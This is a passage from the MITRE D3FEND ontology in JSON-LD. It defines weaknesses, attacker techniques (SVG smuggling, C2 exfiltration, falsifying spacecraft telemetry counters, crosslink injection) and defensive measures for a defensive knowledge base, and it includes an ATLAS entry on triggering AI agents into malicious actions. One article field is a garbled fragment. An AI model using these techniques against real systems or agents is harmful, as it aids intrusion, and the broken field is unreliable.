{
  "@context": {
    "d3f": "http://d3fend.mitre.org/ontologies/d3fend.owl#",
    "dbr": "http://dbpedia.org/resource/",
    "dc": "http://purl.org/dc/elements/1.1/",
    "dcterms": "http://purl.org/dc/terms/",
    "owl": "http://www.w3.org/2002/07/owl#",
    "rdf": "http://www.w3.org/1999/02/22-rdf-syntax-ns#",
    "rdfs": "http://www.w3.org/2000/01/rdf-schema#",
    "skos": "http://www.w3.org/2004/02/skos/core#",
    "xml": "http://www.w3.org/XML/1998/namespace",
    "xsd": "http://www.w3.org/2001/XMLSchema#"
  },
  "@graph": [
    {
      "@id": "d3f:CWE-123",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-123",
      "d3f:definition": "Any condition where the attacker has the ability to write an arbitrary value to an arbitrary location, often as the result of a buffer overflow.",
      "rdfs:label": "Write-what-where Condition",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-787"
      }
    },
    {
      "@id": "d3f:CWE-644",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-644",
      "d3f:definition": "The product does not neutralize or incorrectly neutralizes web scripting syntax in HTTP headers that can be used by web browser components that can process raw headers, such as Flash.",
      "rdfs:label": "Improper Neutralization of HTTP Headers for Scripting Syntax",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-116"
      }
    },
    {
      "@id": "d3f:SPARTAExfiltrationTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:ST0008"
      },
      "rdfs:label": "Exfiltration Technique - SPARTA",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTATechnique"
        },
        {
          "@id": "_:Ne54be4c6a6364ed9b32081a25f72c38c"
        }
      ],
      "skos:prefLabel": "Exfiltration Technique"
    },
    {
      "@id": "_:Ne54be4c6a6364ed9b32081a25f72c38c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ST0008"
      }
    },
    {
      "@id": "d3f:T1417.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1417.002",
      "d3f:definition": "Adversaries may mimic common operating system GUI components to prompt users for sensitive information with a seemingly legitimate prompt. The operating system and installed applications often have legitimate needs to prompt the user for sensitive information such as account credentials, bank account information, or Personally Identifiable Information (PII). Compared to traditional PCs, the constrained display size of mobile devices may impair the ability to provide users with contextual information, making users more susceptible to this technique’s use.(Citation: Felt-PhishingOnMobileDevices)",
      "rdfs:label": "GUI Input Capture - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1417"
      },
      "skos:prefLabel": "GUI Input Capture"
    },
    {
      "@id": "d3f:DE-0003.02",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "DE-0003.02",
      "d3f:definition": "This counter records commands that failed checks or were refused. To hide probing and trial-and-error, the adversary suppresses increments, periodically clears the value, or forges the downlinked field so rejection rates appear benign. Variants also tamper with associated reason codes or event entries, replacing them with innocuous outcomes. Analysts reviewing telemetry see no evidence of failed attempts even as the system is being exercised aggressively.",
      "d3f:modifies": {
        "@id": "d3f:SystemPlatformVariable"
      },
      "rdfs:label": "Rejected Command Counter - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0003/02/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DE-0003"
        },
        {
          "@id": "_:N96b0c3b6943c42d4a98377f8ba73a05d"
        }
      ],
      "skos:prefLabel": "Rejected Command Counter"
    },
    {
      "@id": "_:N96b0c3b6943c42d4a98377f8ba73a05d",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemPlatformVariable"
      }
    },
    {
      "@id": "d3f:Reference-GeneralUseOfLocksInTheProtectionAndControlOfFacilitiesRadioActiveMaterialsClassifiedInformationClassifiedMatterAndSafeguardsInformation",
      "@type": [
        "owl:NamedIndividual",
        "d3f:GuidelineReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://www.nrc.gov/docs/ML1535/ML15357A411.pdf"
      },
      "d3f:kb-abstract": "This regulatory guide (RG) describes methods and procedures that the staff of the U.S. Nuclear\nRegulatory Commission (NRC) considers acceptable for the selection, use, and control of locking\ndevices. Locks can be used in the protection of: areas, facilities, certain radioactive materials, and\nspecific types of information (e.g., classified matter, National Security Information (NSI), Restricted Data\n(RD), Formerly Restricted Data (FRD), Safeguards Information (SGI)).",
      "d3f:kb-author": "U.S. NUCLEAR REGULATORY COMMISSION OFFICE OF NUCLEAR REGULATORY RESEARCH",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "U.S. NUCLEAR REGULATORY COMMISSION OFFICE OF NUCLEAR REGULATORY RESEARCH",
      "d3f:kb-reference-of": [
        {
          "@id": "d3f:PhysicalEnclosureHardening"
        },
        {
          "@id": "d3f:PhysicalLocking"
        }
      ],
      "d3f:kb-reference-title": "REGULATORY GUIDE 5.12 GENERAL USE OF LOCKS IN THE PROTECTION AND CONTROL OF: FACILITIES, RADIOACTIVE MATERIALS, CLASSIFIED INFORMATION, CLASSIFIED MATTER, AND SAFEGUARDS INFORMATION",
      "rdfs:label": "Reference - REGULATORY GUIDE 5.12 GENERAL USE OF LOCKS IN THE PROTECTION AND CONTROL OF: FACILITIES, RADIOACTIVE MATERIALS, CLASSIFIED INFORMATION, CLASSIFIED MATTER, AND SAFEGUARDS INFORMATION"
    },
    {
      "@id": "d3f:T1547.009",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1547.009",
      "d3f:definition": "Adversaries may create or modify shortcuts that can execute a program during system boot or user login. Shortcuts or symbolic links are used to reference other files or programs that will be opened or executed when the shortcut is clicked or executed by a system startup process.",
      "d3f:may-modify": [
        {
          "@id": "d3f:SymbolicLink"
        },
        {
          "@id": "d3f:UserStartupScriptFile"
        }
      ],
      "rdfs:label": "Shortcut Modification",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1547"
        },
        {
          "@id": "_:Nd6b9cecdf47f48c68c12e42f489bed5a"
        },
        {
          "@id": "_:N9fab71f9a47345fca608f8df699ef3c8"
        }
      ]
    },
    {
      "@id": "_:Nd6b9cecdf47f48c68c12e42f489bed5a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SymbolicLink"
      }
    },
    {
      "@id": "_:N9fab71f9a47345fca608f8df699ef3c8",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserStartupScriptFile"
      }
    },
    {
      "@id": "d3f:ATTACKMobileExecutionTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0041"
      },
      "rdfs:label": "Execution Technique - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileTechnique"
        },
        {
          "@id": "_:N86cab9b03a90408191794bb5de872480"
        }
      ],
      "skos:prefLabel": "Execution Technique"
    },
    {
      "@id": "_:N86cab9b03a90408191794bb5de872480",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0041"
      }
    },
    {
      "@id": "d3f:T0805",
      "@type": "owl:Class",
      "d3f:attack-id": "T0805",
      "d3f:definition": "Adversaries may block access to serial COM to prevent instructions or configurations from reaching target devices. Serial Communication ports (COM) allow communication with control system devices. Devices can receive command and configuration messages over such serial COM. Devices also use serial COM to send command and reporting messages. Blocking device serial COM may also block command messages and block reporting messages.",
      "rdfs:label": "Block Serial COM - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
      },
      "skos:prefLabel": "Block Serial COM"
    },
    {
      "@id": "d3f:CWE-779",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-779",
      "d3f:definition": "The product logs too much information, making log files hard to process and possibly hindering recovery efforts or forensic analysis after an attack.",
      "rdfs:label": "Logging of Excessive Data",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-400"
      }
    },
    {
      "@id": "d3f:UserApplication",
      "@type": "owl:Class",
      "d3f:definition": "A user application is executed for that an individual user on a user's personal computer or remotely by means of virtualization.  This is in contrast to service applications or enterprise software.",
      "rdfs:label": "User Application",
      "rdfs:seeAlso": {
        "@id": "dbr:Enterprise_software"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:Application"
      }
    },
    {
      "@id": "d3f:M1039",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": [
        {
          "@id": "d3f:ApplicationConfigurationHardening"
        },
        {
          "@id": "d3f:SystemFileAnalysis"
        }
      ],
      "rdfs:label": "Environment Variable Permissions"
    },
    {
      "@id": "d3f:T1027.017",
      "@type": "owl:Class",
      "d3f:attack-id": "T1027.017",
      "d3f:definition": "Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign SVG files.(Citation: Trustwave SVG Smuggling 2025) SVGs, or Scalable Vector Graphics, are vector-based image files constructed using XML. As such, they can legitimately include `<script>` tags that enable adversaries to include malicious JavaScript payloads. However, SVGs may appear less suspicious to users than other types of executable files, as they are often treated as image files.",
      "rdfs:label": "SVG Smuggling",
      "rdfs:subClassOf": {
        "@id": "d3f:T1027"
      }
    },
    {
      "@id": "d3f:FileEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event involving operations performed on digital files, encompassing actions such as creation, modification, deletion, access, and attribute or permission changes.",
      "rdfs:label": "File Event",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/classes/file_activity"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalEvent"
        },
        {
          "@id": "_:Nefd1f273743b42b0b3dde436a9a03b7c"
        }
      ]
    },
    {
      "@id": "_:Nefd1f273743b42b0b3dde436a9a03b7c",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "d3f:DataInventory",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DataInventory"
      ],
      "d3f:d3fend-id": "D3-DI",
      "d3f:definition": "Data inventorying identifies and records the schemas, formats, volumes, and locations of data stored and used on the organization's architecture.",
      "d3f:inventories": [
        {
          "@id": "d3f:Database"
        },
        {
          "@id": "d3f:DocumentFile"
        }
      ],
      "d3f:kb-reference": {
        "@id": "d3f:Reference-DataProcessingAndScanningSystemsForGeneratingAndPopulatingADataInventory"
      },
      "d3f:synonym": [
        "Data Discovery",
        "Data Inventorying"
      ],
      "rdfs:label": "Data Inventory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AssetInventory"
        },
        {
          "@id": "_:N4fcf48e877684894a901ce1f6a003fda"
        },
        {
          "@id": "_:N0ff79e87458848cd803265a4f6dc4f6f"
        }
      ]
    },
    {
      "@id": "_:N4fcf48e877684894a901ce1f6a003fda",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:inventories"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Database"
      }
    },
    {
      "@id": "_:N0ff79e87458848cd803265a4f6dc4f6f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:inventories"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DocumentFile"
      }
    },
    {
      "@id": "d3f:ScriptApplicationProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A script application process is an application process interpreting an executable script.",
      "d3f:interprets": {
        "@id": "d3f:ExecutableScript"
      },
      "rdfs:label": "Script Application Process",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ApplicationProcess"
        },
        {
          "@id": "_:N69b125421a56454f8cb848b9291f7d44"
        }
      ],
      "skos:altLabel": "Script Process"
    },
    {
      "@id": "_:N69b125421a56454f8cb848b9291f7d44",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:interprets"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ExecutableScript"
      }
    },
    {
      "@id": "d3f:AML.T0084.002",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0084.002",
      "d3f:definition": "Adversaries may discover keywords or other triggers (such as incoming emails, documents being added, incoming message, or other workflows) that activate an agent and may cause it to run additional actions.\n\nUnderstanding these triggers can reveal how the AI agent is activated and controlled. This may also expose additional paths for compromise, as an adversary could attempt to trigger the agent from outside its environment and drive it to perform unintended or malicious actions.",
      "rdfs:label": "Activation Triggers - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0084.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0084"
      },
      "skos:prefLabel": "Activation Triggers"
    },
    {
      "@id": "d3f:InputDeviceAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:InputDeviceAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:InputDevice"
      },
      "d3f:d3fend-id": "D3-IDA",
      "d3f:definition": "Operating system level mechanisms to prevent abusive input device exploitation.",
      "d3f:kb-article": "## How it works\n\nInput Device Hardening techniques filter certain commands, or disable related operating system functionality.\n\n### Analytics\n\nAll of these values can be analyzed and compared to a baseline:\n\n* Amount of input\n* Duration of a single input\n* Durations between inputs\n* Value of input\n\nContext can also include:\n\n* User which is logged in, to include attributes such as physical location of the user\n* Date and time\n* System which is processing the input\n* Source device of input, to include its properties (eg. manufacturer), configuration (eg. keyboard layout) and behavioral attributes of this device (eg. first use)\n* Source system of input (local or remote system)\n* Other hardware devices attached to the system\n\n\n### Actions\n\nActions can include:\n\n* Disabling the source device\n* Sending an alert\n* Locking the current session (eg. system screen lock, or returning to an authentication screen in a web app) and requiring one or more methods of authentication to continue\n* Administratively disabling credentials for the account or the entire account -- the technique *Account Locking*\n\n\n### Examples\nA malicious input device sends many keystrokes with approximately the same delay between each.  This does not match the normal cadence of input, and the device is disabled.\n\nInput to type the session user's name takes abnormally longer for each keystroke.  The system is locked to the password prompt screen.\n\nA system receives key press events from two different devices -- one device sends keystrokes after the other has been idle for a long time.\n\nA system receives physical input in a user session, while that user has sent input from a device located out of the country in the past hour.\n\nNetwork traffic is suddenly routed through a new external device, and nearly the same volume of network traffic is subsequently sent out the previously existing interface.  The new external device is disabled, and an alert is raised to investigate the network configuration for a potential compromise.\n\n\n## Considerations\n\nGiven some example of legitimate behavioral input patterns, attackers could mimic those input patterns, a technique which has been used in popular culture in the creation of Deepfake videos and [This Person Does Not Exist](https://thispersondoesnotexist.com).",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-www.biometric-solutions.com_keystroke-dynamics"
        },
        {
          "@id": "d3f:Reference-ContinuousAuthenticationByAnalysisOfKeyboardTypingCharacteristics_BradfordUniv.,UK"
        }
      ],
      "rdfs:label": "Input Device Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperatingSystemMonitoring"
        },
        {
          "@id": "_:Nea1c7d2a044442fab21f109fedb78f43"
        }
      ]
    },
    {
      "@id": "_:Nea1c7d2a044442fab21f109fedb78f43",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InputDevice"
      }
    },
    {
      "@id": "d3f:PhysicalLocking",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:PhysicalLocking"
      ],
      "d3f:d3fend-id": "D3-EPL",
      "d3f:definition": "Employ a mechanical locking device for securing moveable portions of physical barriers (e.g., doors, gates, drawers) in a secured position.",
      "d3f:kb-article": "## How it works\n\nA physical mechanism which has a associated credential which when entered enables the lock bolt to operate, i.e. open or close.\n\n## Considerations\n\n* Consider that locks for specified materials should adhere to relevant regulations.\n\n* Lock equipment cabinets when not needed for operation or safety; set OT asset keys of devices (e.g., PLCs and safety systems) to the “RUN” position unless otherwise specified.\n\n* Locks and all associated hardware should be properly installed, operable, and free of substantive indications of tampering.\n\n* Records should be maintained concerning maintenance performed, access, and any possible tampering marks or associated incidents.\n\n* For locks operated by a physical key, a key management system should be implemented to manage and secure physical keys.\n\n* Key locks should provide a high degree of resistance to opening by force and tampering techniques.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-GeneralUseOfLocksInTheProtectionAndControlOfFacilitiesRadioActiveMaterialsClassifiedInformationClassifiedMatterAndSafeguardsInformation"
        },
        {
          "@id": "d3f:Reference-GuideToOTSecurity"
        }
      ],
      "d3f:mediates-access-to": {
        "@id": "d3f:ComputerEnclosure"
      },
      "rdfs:label": "Physical Locking",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PhysicalAccessMediation"
        },
        {
          "@id": "_:Ncf277d0b2a1e4b47b6c683ccc4e5d39b"
        }
      ]
    },
    {
      "@id": "_:Ncf277d0b2a1e4b47b6c683ccc4e5d39b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:mediates-access-to"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:ComputerEnclosure"
      }
    },
    {
      "@id": "d3f:T1041",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1041",
      "d3f:definition": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.",
      "d3f:may-transfer": {
        "@id": "d3f:CertificateFile"
      },
      "d3f:produces": {
        "@id": "d3f:InternetNetworkTraffic"
      },
      "rdfs:label": "Exfiltration Over C2 Channel",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExfiltrationTechnique"
        },
        {
          "@id": "_:Nb847f6fc2dba4b39b0b768519bbecfad"
        },
        {
          "@id": "_:Nd43e7370e6e8459b9dd45b54bd99d356"
        }
      ]
    },
    {
      "@id": "_:Nb847f6fc2dba4b39b0b768519bbecfad",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-transfer"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CertificateFile"
      }
    },
    {
      "@id": "_:Nd43e7370e6e8459b9dd45b54bd99d356",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:InternetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:SystemPasswordDatabase",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A password database used by a system service or process to authenticate users (e.g., Security Account Manager)",
      "rdfs:label": "System Password Database",
      "rdfs:subClassOf": {
        "@id": "d3f:PasswordDatabase"
      }
    },
    {
      "@id": "d3f:OSAPICreateFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that creates a file.",
      "d3f:invokes": {
        "@id": "d3f:CreateFile"
      },
      "rdfs:label": "OS API Create File",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:Nd8202cf2a50a468fa6a956a248bce148"
        }
      ]
    },
    {
      "@id": "_:Nd8202cf2a50a468fa6a956a248bce148",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateFile"
      }
    },
    {
      "@id": "d3f:T1565",
      "@type": "owl:Class",
      "d3f:attack-id": "T1565",
      "d3f:definition": "Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: Sygnia Elephant Beetle Jan 2022) By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.",
      "rdfs:label": "Data Manipulation",
      "rdfs:subClassOf": {
        "@id": "d3f:ImpactTechnique"
      }
    },
    {
      "@id": "d3f:T1589.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1589.002",
      "d3f:definition": "Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees.",
      "rdfs:label": "Email Addresses",
      "rdfs:subClassOf": {
        "@id": "d3f:T1589"
      }
    },
    {
      "@id": "d3f:OSAPISuspendProcess",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An OS API function that pauses the execution of a process.",
      "d3f:invokes": {
        "@id": "d3f:SuspendProcess"
      },
      "rdfs:label": "OS API Suspend Process",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPISystemFunction"
        },
        {
          "@id": "_:Ncf6e697715564322a4fe88e8d17e35df"
        }
      ]
    },
    {
      "@id": "_:Ncf6e697715564322a4fe88e8d17e35df",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SuspendProcess"
      }
    },
    {
      "@id": "d3f:CWE-799",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-799",
      "d3f:definition": "The product does not properly limit the number or frequency of interactions that it has with an actor, such as the number of incoming requests.",
      "d3f:synonym": [
        "Brute force",
        "Insufficient anti-automation"
      ],
      "rdfs:label": "Improper Control of Interaction Frequency",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-691"
      }
    },
    {
      "@id": "d3f:AML.T0005.002",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0005.002",
      "d3f:definition": "Adversaries may use an off-the-shelf pre-trained model as a proxy for the victim model to aid in staging the attack.",
      "rdfs:label": "Use Pre-Trained Model - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0005.002"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:AML.T0005"
      },
      "skos:prefLabel": "Use Pre-Trained Model"
    },
    {
      "@id": "d3f:IA-0003",
      "@type": "owl:Class",
      "d3f:attack-id": "IA-0003",
      "d3f:definition": "Where spacecraft exchange data over inter-satellite links (RF or optical), a compromise on one vehicle can become a bridgehead to others. Threat actors exploit crosslink trust: shared routing, time distribution, service discovery, or gateway functions that forward commands and data between vehicles and ground. With knowledge of crosslink framing, addressing, and authentication semantics, an adversary can craft traffic that appears to originate from a trusted neighbor, injecting control messages, malformed service advertisements, or payload tasking that propagates across the mesh. In tightly coupled constellations, crosslinks may terminate on gateways that also touch the C&DH or payload buses, providing additional pivot opportunities. Because crosslink traffic is expected and often high volume, attacker activity can be timed to blend with synchronization intervals, ranging exchanges, or scheduled data relays.",
      "rdfs:label": "Crosslink via Compromised Neighbor - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0003/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAInitialAccessTechnique"
      },
      "skos:prefLabel": "Crosslink via Compromised Neighbor"
    },
    {
      "@id": "d3f:CCI-000139_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system alerts designated organization-defined personnel or roles in the event of an audit processing failure.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:SystemDaemonMonitoring"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-15T00:00:00"
      },
      "rdfs:label": "CCI-000139"
    },
    {
      "@id": "d3f:CWE-759",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-759",
      "d3f:definition": "The product uses a one-way cryptographic hash against an input that should not be reversible, such as a password, but the product does not also use a salt as part of the input.",
      "rdfs:label": "Use of a One-Way Hash without a Salt",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-916"
      }
    },
    {
      "@id": "d3f:HTTPOptionsEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the HTTP OPTIONS method is used to describe the communication options for the target resource.",
      "rdfs:label": "HTTP OPTIONS Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HTTPRequestEvent"
      }
    },
    {
      "@id": "d3f:WindowsNtReadFile",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "The NtReadFile routine reads data from an open file.",
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows-hardware/drivers/ddi/ntifs/nf-ntifs-ntreadfile"
      },
      "rdfs:label": "Windows NtReadFile",
      "rdfs:seeAlso": {
        "@id": "https://j00ru.vexillium.org/syscalls/nt/64/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OSAPIReadFile"
      }
    },
    {
      "@id": "d3f:Reference-IdentificationAndExtractionOfKeyForensicsIndicatorsOfCompromiseUsingSubject-specificFilesystemViews",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20200004962A1/en"
      },
      "d3f:kb-abstract": "A stackable filesystem that transparently tracks process file writes for forensic analysis. The filesystem comprises a base filesystem, and an overlay filesystem. Processes see the union of the upper and lower filesystems, but process writes are only reflected in the overlay. By providing per-process views of the filesystem using this stackable approach, a forensic analyzer can record a process's file-based activity-i.e., file creation, deletion, modification. These activities are then analyzed to identify indicators of compromise (IoCs). These indicators are then fed into a forensics analysis engine, which then quickly decides whether a subject (e.g., process, user) is malicious. If so, the system takes some proactive action to alert a proper authority, to quarantine the potential attack, or to provide other remediation. The approach enables forensic analysis without requiring file access mediation, or conducting system event-level collection and analysis, making it a lightweight, and non-intrusive solution.",
      "d3f:kb-author": "Frederico Araujo; Anne E. Kohlbrenner; Marc Philippe Stoecklin; Teryl Paul Taylor",
      "d3f:kb-reference-title": "Identification and extraction of key forensics indicators of compromise using subject-specific filesystem views",
      "rdfs:label": "Reference - Identification and extraction of key forensics indicators of compromise using subject-specific filesystem views"
    },
    {
      "@id": "d3f:Reference-ComputerMotherboardHavingPeripheralSecurityFunctions",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US8869308B2/en"
      },
      "d3f:kb-abstract": "A secure motherboard for a computer, wherein each user accessible peripheral port is protected by hardware based peripheral protection circuitry soldered to the motherboard.",
      "d3f:kb-author": "Aviv Soffer",
      "d3f:kb-organization": "High Sec Labs Ltd",
      "d3f:kb-reference-of": {
        "@id": "d3f:IOPortRestriction"
      },
      "d3f:kb-reference-title": "Computer motherboard having peripheral security functions",
      "rdfs:label": "Reference - Computer motherboard having peripheral security functions"
    },
    {
      "@id": "d3f:ExpectedModelChange",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-EMC",
      "d3f:definition": "Supervised learning establishes a relationship between the known input and output variables to conduct a predictive analysis.",
      "d3f:kb-article": "nal Consiterations\n\n## References\nIntro to Active Learning. inovex Blog. [Link](https://www.inovex.de/de/blog/intro-to-active-learning/).",
      "rdfs:label": "Expected Model Change",
      "rdfs:subClassOf": {
        "@id": "d3f:ActiveLearning"
      }
    },
    {
      "@id": "d3f:REC-0005.01",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0005.01",
      "d3f:definition": "Uplink reconnaissance focuses on capturing the command path from ground to spacecraft to learn telecommand framing, authentication fields, timing, and anti-replay behavior. Valuable artifacts include emission designators, symbol rates, polarization sense, Doppler profiles, and any preambles or ranging tones that gate command acceptance. Even if payload and TT&C share spectrum, their authentication postures often differ, knowledge an adversary can exploit. Partial captures, console screenshots, or training recordings reduce the effort needed to build an SDR pipeline that “looks right” on the air. Where missions authenticate without encrypting the uplink, traffic analysis can reveal command cadence and maintenance windows.",
      "rdfs:label": "Uplink Intercept Eavesdropping - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0005/01/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0005"
      },
      "skos:prefLabel": "Uplink Intercept Eavesdropping"
    },
    {
      "@id": "d3f:T1641.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1641.001",
      "d3f:definition": "Adversaries may alter data en route to storage or other systems in order to manipulate external outcomes or hide activity. By manipulating transmitted data, adversaries may attempt to affect a business process, organizational understanding, or decision making.",
      "rdfs:label": "Transmitted Data Manipulation - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1641"
      },
      "skos:prefLabel": "Transmitted Data Manipulation"
    },
    {
      "@id": "d3f:T1505.006",
      "@type": "owl:Class",
      "d3f:attack-id": "T1505.006",
      "d3f:definition": "Adversaries may abuse vSphere Installation Bundles (VIBs) to establish persistent access to ESXi hypervisors. VIBs are collections of files used for software distribution and virtual system management in VMware environments. Since ESXi uses an in-memory filesystem where changes made to most files are stored in RAM rather than in persistent storage, these modifications are lost after a reboot. However, VIBs can be used to create startup tasks, apply custom firewall rules, or deploy binaries that persist across reboots. Typically, administrators use VIBs for updates and system maintenance.",
      "rdfs:label": "vSphere Installation Bundles",
      "rdfs:subClassOf": {
        "@id": "d3f:T1505"
      }
    },
    {
      "@id": "d3f:T1016",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1016",
